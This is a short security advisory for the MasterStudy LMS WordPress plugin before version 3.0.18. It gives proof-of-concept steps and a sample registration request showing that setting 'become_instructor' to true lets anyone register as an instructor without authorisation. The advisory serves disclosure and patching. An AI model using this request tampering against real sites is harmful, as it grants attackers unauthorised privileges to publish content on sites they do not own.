MasterStudy LMS < 3.0.18 - Unauthenticated Instructor Account Creation

Description The plugin does not have proper checks in place during registration allowing anyone to register on the site as an instructor. They can then add courses and/or posts.

PoC

1. Visit the Profiles Settings page for the plugin: MS LMS > LMS Settings > Profiles 2. Ensure that “Disable Instructor Registration” and “Disable Instructor Pre-moderation” are both “On”. Save settings. 3. On a course page, click “Enroll Course” 4. Register a new user. Intercept the request, ex: {"user_login":"user123","user_email":"[email protected]","user_password":"Password123","user_password_re":"Password123","become_instructor":"true","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":[],"redirect_page":"http://site.com/user-account/"} 4. Change the become_instructor value to true 5. The account will have instructor privileges, allowing them to add new courses and publish blog posts for review.